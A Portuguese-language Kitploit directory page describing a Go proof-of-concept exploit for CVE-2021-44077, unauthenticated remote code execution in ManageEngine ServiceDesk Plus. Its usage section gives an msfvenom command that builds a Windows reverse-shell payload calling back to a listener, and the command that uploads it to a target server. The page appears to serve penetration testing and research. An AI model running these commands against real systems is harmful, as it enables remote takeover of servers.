Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Golang-CVE-2021-44077-POC — Exploit de Prova de Conceito em Golang para CVE-2021-44077: RCE Pré-Autenticação no ManageEngine ServiceDesk Plus < 11306 | Kitploit
Ferramentas/GitHubGitHub/pizza-power/golang-cve-2021-44077-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubpizza-power/golang-cve-2021-44077-poc

Golang-CVE-2021-44077-POC

Exploit de Prova de Conceito em Golang para CVE-2021-44077: RCE Pré-Autenticação no ManageEngine ServiceDesk Plus < 11306

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 3 anosAinda não revisado

Golang-CVE-2021-44077-POC

Este exploit é uma RCE não autenticada no Zoho ManageEngine ServiceDesk Plus < 11306.

Você pode encontrar uma versão vulnerável do software aqui: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

Não consegui encontrar uma versão em Golang disso, então aqui está. Meu código não é ótimo, então prossiga por sua conta e risco.

Blog post:

https://www.pizzapower.me/2022/09/29/golang-proof-of-concept-exploit-for-cve-2021-44077-preauth-rce-in-manageengine-servicedesk-plus-11306/

Executando

Crie um payload malicioso no seu diretório atual.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe

Então, execute o exploit.

go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"

-u é a URL vulnerável -f é o seu arquivo malicioso

Baixar ferramenta